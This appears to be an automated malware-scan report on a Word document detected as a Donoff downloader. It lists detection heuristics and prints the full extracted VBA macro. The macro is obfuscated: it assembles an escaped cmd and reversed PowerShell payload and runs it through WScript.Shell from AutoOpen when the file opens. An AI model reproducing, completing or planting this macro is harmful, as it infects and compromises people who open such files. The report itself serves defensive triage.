MALICIOUS
310
Risk Score
Heuristics 10
-
ClamAV: Doc.Downloader.Donoff-6665649-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Donoff-6665649-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Error 97883 * jMlrb / ZNqYDz * 72059 dcbwp = CreateObject("WScript.Shell") _ . _ -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Error 97883 * jMlrb / ZNqYDz * 72059 dcbwp = CreateObject("WScript.Shell") _ . _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "oasizwwuo" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9675 bytes |
SHA-256: 9ac5afc5b078c465cc44c29c11e514d6a28cc421f0ecd6b1528cec54d0a8e324 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
113 of 195 identifiers look randomly generated (e.g. 'fOiZBLwQRFa'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "LUEBuKp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ciccFjHQiQ"
Function cjjLKEJkzVX()
On Error Resume Next
Error 38487 * MJpwpF
Error lVvchP / hLALdC
Error 44240 * TjBQXa * 90183 / RIrEz
Error 38222 * SjlMUD
HUCit = "md /V" + "^ ^ ^ /" + "c " + Chr(5 + 4 + 2 + 3 + 20) + " " + "^S^E" + "^t ^KM^" + "9^P==" + "AA^IA" + "A" + "CAgAAI^" + "A^AC" + "^Ag"
Error CMODY / fuJQd
Error 64335 * dIIYl / 27741 * hQFuJA
jPCWPORj = "A^AIAA" + "C^" + "A^g^A" + "AI" + "^AACA^g" + "^A^" + "AIA"
Error 79574 / hJGzN / 97196 * HJzrS
Error zpvEAr / jTAHLu * 32415 / lYLDG
mKSXultAE = "^AC^" + "A^gA^" + "A^" + "I^AACA" + "^9^BQ" + "f^As^H^"
Error 8926 / FJWtNv * 25308 / OjYsS
LdBZQDo = "AoB^" + "wY^AQ" + "HA^hB^w" + "^YA^0" + "H^A" + "^7" + "^Aw^aA" + "^EG^" + "AlBgc" + "^AI^G" + "^A7^A"
Error vuthh * szNDw
Error 29252 / 16173
Error 73656 / LwzEv
DzvHh = "w^d^A^8" + "^EAV^B" + "^AJ^" + "A^" + "AC^AtBQ" + "^ZAQHAJ" + "^B^Q" + "L^AU" + "^G" + "^Ar^" + "B^w^b"
Error LcohV * zGQomX / 14107 * jKMZc
Error wiiZPo / RcKok
Error 95665 / DHwDp * 92883 * oGBKFm
oNVOjtowI = "^AY^" + "HAu" + "B" + "QSAsD" + "^A^p^A" + "^wd^" + "A^8" + "^" + "E^AV^" + "BA^J^A" + "AC^A" + "^s"
Error 27910 * owpSpn / hEhRzP / KHAZj
Error 34788 / Dfchk
WqBzrsN = "A" + "g^U" + "^A^UE" + "^" + "A^1B^A" + "^J^A^" + "gCAl^B" + "^AbA^k" + "GA" + "^G^B" + "A" + "^ZA" + "^"
Error 30968 * uztoC
VkEmHScm = "E^G^Av^" + "B" + "^A^b" + "A4^G^A" + "3^B^w^" + "b^A" + "Q^E" + "^Au^" + "AgaAcFA" + "WB" + "^AJ^A" + "^s^H"
Error UFVkO / 18343 * 82338 / sAwmvj
Error oWlrr / DdSLU
Error vmrUYs / fjXwRJ
Error 26073 * sJpICi / oTWzVU / zHMMf
Error 14895 * wCERa
VzTwwuIkU = "A^5^B" + "^gc" + "^A" + "^" + "QHA7"
Error RLRcL / LfpMw
OiMwzQojhi = "^" + "B^QKA^Y" + "^FA" + "^wBQ" + "cA^Q" + "CAg^Ag^" + "bAk" + "G^AgAg^" + "U^AUE" + "A1^B^A" + "^J^A" + "gC^Ao" + "^BwY"
Error uEGat / uWTUEw
Error VOwFKw * GJMkub
KzlVTVsBl = "^" + "AEG" + "AlB^gc" + "A8^G^" + "A^m^Bw^" + "OAcC" + "^A^l^B"
Error twacc * KiKEKu * zYMQXJ / OsrGTo
Error 88646 * wIirHa
BuwEDjhdw = "^A" + "^e^AUG" + "AuA^" + "w^" + "JAsC^A"
cjjLKEJkzVX = HUCit + jPCWPORj + mKSXultAE + LdBZQDo + DzvHh + oNVOjtowI + WqBzrsN + VkEmHScm + VzTwwuIkU + OiMwzQojhi + KzlVTVsBl + BuwEDjhdw
Error 13969 * 23097
Error 8184 * vGntO
End Function
Function IuUfVPSznl()
On Error Resume Next
Error iEBEz * FUJnw
Error 85639 / wcDkW
WOAazkccTPw = "^" + "T" + "^" + "B^g^e" + "^A" + "o^F"
Error LiWwz * SaajFS
Error jmKZB * 5963 / 96585 * dnXjK
dCiPmUoq = "^Ak^A" + "^wKAc" + "CAc^B" + "^wJ" + "^A" + "sCAjB^Q" + "^a^A" + "^wG^"
Error 57581 / XiUtTh
Error thjzKM * MVjAP / 23617 / dwrRP
Error VCiMO * arsvQ * wOmLm / ibOaG
cjoNIHpHBip = "A" + "iB" + "Qd^A^AH" + "A" + "^6^A"
Error 85891 / wJGPw
Error 80228 / vwPUcq * hjLMbh / wapFiW
ONfbEizZ = "^gd^A^" + "4^G^Al" + "B^A^" + "J^" + "A0" + "^D^A^" + "3^B^w^T" + "A^UF" + "A^k^A^" + "wO^"
Error 24002 / 85235
GLZSIfNLa = "Ac" + "CA^" + "y^A" + "wN" + "AEDAnA" + "A^I" + "A0DA^g" + "A^" + "wUA" + "^o^H" + "^Aa" + "B^AJA^s"
Error 75145 / DzHpfm * 9744 * wuAGA
Error TEDBd / EXvvji
Error MrRbLN * ZssTlE
Error 91579 * YVYJz
PLIGOouoWX = "^D^Ap^A" + "w^JA^A" + "^EAnA" + "AK" + "A^QHAp^" + "B" + "^Ab" + "A^A" + "^HA^T"
Error bdXYOz * 23719
JPwFA = "Bg^" + "L^AcC" + "ASB^QW^" + "AY^" + "GArBwS^" + "A^8C" + "^AtB^w^" + "bA^M^G" + "Au^A^wc" + "A^" + "U^GA^p^"
Error 60585 * avCzF
Error UVfii / dmTzN * mWjHbX / 12837
cBvQpsC = "B^gcA^" + "kH^" + "Ar^" + "Bwc^A^4" + "CA^kBg"
Error 49380 * vjzDUK
Error SOrjO * wuUub / OnFtCr * abziSu
Error 70125 / 97601
Error 98350 / cwauj * qVridm * OwUIb
FNZQQwclk = "b^A8^" + "GA^wB^" + "w" + "cA" + "I^H^Al^" + "B^A^Z" + "^A4^G" + "A" + "1^B^wb^"
IuUfVPSznl = WOAazkccTPw + dCiPmUoq + cjoNIHpHBip + ONfbEizZ + GLZSIfNLa + PLIGOouoWX + JPwFA + cBvQpsC + FNZQQwclk
Error WuvTjY / bjwLVl
Error 60563 * tYwMWw
Error MPEwSc / dwfFD / 59807 / AWFtKj
End Function
Function fOiZBLwQRFa()
On Error Resume Next
Error 63205 / QjPCH
Error ZwzGQ * mJEai
Error tcISY * HclPjv / pilMVV / 17973
JMpYwrMCrj = "A^Y^GA" + "v^A^w" + "L^A^" + "o" + "D^A^w^" + "BA^dAQ^"
Error 8854 / TjCSkG
wzcORwoOSWO = "H" + "^A^" + "o^BAQ" + "^AgHAW^" + "BQN^A" + "^4^"
Error 89251 / VoXwif
Error ojRLhi / XrFNN
Error XbzoZ * 78579 * fJwAIU / NQqqcu
Error 41406 / HCXOM
KNGkGFdGjn = "G^ANBQa" + "AI^HAC" + "B^wL^A0" + "GAv^BwY" + "^A4C" + "A^4" + "^B^" + "QdA^" + "Q" + "H^A^o"
Error 40878 * tHQwzq / smIZT * ZJKJb
Error 44046 * nWCLrm
TLrss = "^Bw^" + "ZA^kGA" + "^s^" + "Bg" + "L^A" + "^k" + "H^"
Error QJcUON / RSAljI
Error wwcODC * mwvGkO
Error 10767 / DRGsQ * 81244 / KvhsIN
Error 4069 / nFOuJn
RcLDKfY = "A^kBg^" + "b^AUG^" + "A" + "mBwLA8C" + "A6^" + "A^" + "Ac^A^Q" + "H^A0" + "^BAa^" + "AA"
Error XiZIcO / NwhRBp
Error 12857 * 12245 * SWKfY * sbzIW
vCFColvD = "E^A" + "zA^w^Q" + "A^kE" + "^ATBAM" + "^A8C" + "Ar" + "^BA" + "^d^A^" + "4" + "C^" + "AsB" + "^QY^"
Error 29553 * iQtLRC
Error MvQEk * zaHorV
QpCdsVCaiW = "A^" + "kGA" + "^y^B^" + "wbAQHA1" + "BA" + "d^" + "Ac^G^A" + "v^B^A" + "^b^A"
Error 93933 / SjhfFJ
skuhvZF = "^IGA^" + "zB^Q^a" + "A" + "^gGAl^B" + "^" + "w^L^A" + "8CA6" + "^AAcA" + "^QH^A" + "^" + "0BA" + "^a^A^A" + "E^"
fOiZBLwQRFa = JMpYwrMCrj + wzcORwoOSWO + KNGkGFdGjn + TLrss + RcLDKfY + vCFColvD + QpCdsVCaiW + skuhvZF
Error XXYmu / PwDzkH * 16058 / 16638
Error 98994 * OWCttL
Error tlVnNC * OlNFYn
End Function
Function tMRmwQX()
On Error Resume Next
Error WzUMrJ * jfWvf / 99332 * dLFrB
pZBnJ = "A" + "v^BA^" + "e^A^" + "g^H^Ar" + "^BAR^A8" + "CA1^" + "B" + "^gc^" + "A^" + "4" + "CAh^Bgb" + "^A" + "k^GAn"
Error 25065 / tTvLvh
Error pursW * sauBXa / wqHCj * mIqHM
VQLEvN = "BQYA^g" + "^GA" + "j^B^" + "gc^A8^G" + "Ar^BQ" + "LAIHAv" + "^BA^dAM" + "^G^Av" + "^BA^Z"
Error 97269 * zqbsL
Error Vwncq / ctIZB / VzpRpI * znidJ
Error lEwlv * 5548
qOICJ = "A^4CA0^" + "B^gb" + "AU^G^A" + "k^B^" + "w^LA^" + "8CA6AAc" + "^" + "A^QH" + "A^" + "0B^A^aA" + "A^EAR"
Error swcCh / 62766 / sELkUD / 25261
Error 7873 / LCYVGu / ZIImq * 40576
Error 22334 * JVKTK / 41871 / CMJXO
Error 70853 / anwIa / svVSCf / vjTVCE
kqtEfUhh = "B" + "Q^" + "U^A^s^E" + "AkB" + "^wQ" + "A^" + "8C" + "A^t^B" + "w"
Error zMDicw / aWVSG
Error 38273 / TCNYB
Error 60128 * SNkHM * 26314 / MaQBAi
Error 3161 * Jvhzs
Error PiBoN * 71018
rzlHcPjwhIV = "bA^" + "MGAuA^" + "Q^" + "Z^AIH" + "ArB" + "^gcA^kG" + "At" + "B" + "^g^L^" + "Ac^H" + "^A^sB" + "^wL^A^" + "8C^A"
Error ZEzIu * vBNhCw / EfjOSz * EZDoTQ
Error ILnNl * HuELlz
Error shHTMw * 55923 * 16418 / sSSHHw
TPijz = "^6A" + "^AcAQH" + "A" + "^0B^A^a" + "^AcC" + "A9A^gV" + "^A" + "^A^H" + "AxBA^J"
tMRmwQX = pZBnJ + VQLEvN + qOICJ + kqtEfUhh + rzlHcPjwhIV + TPijz
Error Jfaik * bXIVz
Error 77199 * COVwTA * 51495 * zBJod
Error 59035 * bzifWl
End Function
Function wiKYiYFqw()
On Error Resume Next
Error 70472 * TlidHS
qRGFGf = "AsD^A0" + "^" + "Bgb^" + "AU^G" + "^A^p" + "BA^b" + "AM" + "E^Ai"
Error fJHJj * 72647
Error 45306 / wSfbDt * 53598 * MbTTwS
Error 73628 / wRzQq * 33252 / JfzIS
oUPSfzLEw = "BQZ" + "^AcF" + "A^u" + "^AA^d" + "^A^" + "U" + "GAO" + "BA" + "^" + "I^A^Q" + "HA^jBQ"
Error 30291 / XtMFb
Error qWBfG * wLqZwo * KMBNO / kbzwak
Error 55128 * hKJUA * 80067 / EDnuj
Error OJBtM * WivPn
Error 51611 * KIJQS / 30556 / chfABb
wNnMYDK = "^" + "ZAoG^A" + "i^B^w^" + "b^" + "A^0C^A3"
Error 57432 / umnGY
Error UYMXfT / iBfwdd
Error 76413 * OAfiMl
Error 90737 / VKhcYS / 20051 * ZBYsT
Error FusJc * BCAzta
lWJXp = "^B^Q" + "ZA4^G^A" + "^9" + "Aga" + "AcFA" + "^WBAJ" + "^ e" + "^-^ " + "^ll^e" + "hsr^e" + "^" + "w^"
Error 27823 / PZujf
Error IoJZC / PsXjUf / 26510 * zCqDj
Error 68029 * RXiir / QfunK / IJPHFJ
Error 70168 / ZCRcZ / LkuoTH * qiDDd
Error mkiHW * oQZZlX / zJdXv * wluNzm
Error phqhR / SRjUv
ANFSppJQ = "o" + "^p& ^F" + "^OR " + "/^L %^" + "M ^IN (" + " ^" + " "
Error 58585 / jlKqbi
rfWBvrESt = "1" + "^0^0" + "^1^ ^ " + "^" + ", " + "-1^ " + " ,^ ^" + " 0 )" + "D^" + "o " + " Se" + "^T xF"
Error NQBdm / 75089
Error 42437 / 77703
Error 55451 / NQdNJj * 25321 / YINSiV
Error 71037 / 236
Error 10141 / nrnnN * 33755 * 77359
hcljsIIH = "=" + "!xF!!^" + "KM^9^" + "P" + ":~%^" + "M, " + " 1!&&" + " " + "i^F " + "%"
Error jJhCp / wczsc / 49045 / wALit
Error 73917 / nVoZK / qZatU * oZjiKc
Error 36537 / KWVQG * 79654 / RRoqzI
zjNjXzDI = "^M ^Ls" + "^" + "S ^1 " + "C" + "a^" + "l" + "^l" + " " + "%xF:^*^" + "x" + "^F^!^" + "=% " + " "
Error itEYlD * biKVWw
Error 58914 / mknPNb * QviqYY * QcdcnT
Error wpNUGd * EMpfzi
KXOVOj = " " + Chr(5 + 4 + 2 + 3 + 20) + ""
wiKYiYFqw = qRGFGf + oUPSfzLEw + wNnMYDK + lWJXp + ANFSppJQ + rfWBvrESt + hcljsIIH + zjNjXzDI + KXOVOj
Error RUHwZb * TjQYDT
End Function
Attribute VB_Name = "oasizwwuo"
Sub AutoOpen()
On Error Resume Next
Error 46481 / 26051
Error Ivjstq * 77205
Error 97883 * jMlrb / ZNqYDz * 72059
dcbwp = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(0 + 3 + 0 + 7 + 57) + TaMJZCCo + UqTHRnjf + cjjLKEJkzVX + IuUfVPSznl + fOiZBLwQRFa + tMRmwQX + wiKYiYFqw + uOdFjcd + bvLijHZ, 887574870 - 887574870)
Error QWALs / USccaF / 19049 * AAMEw
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.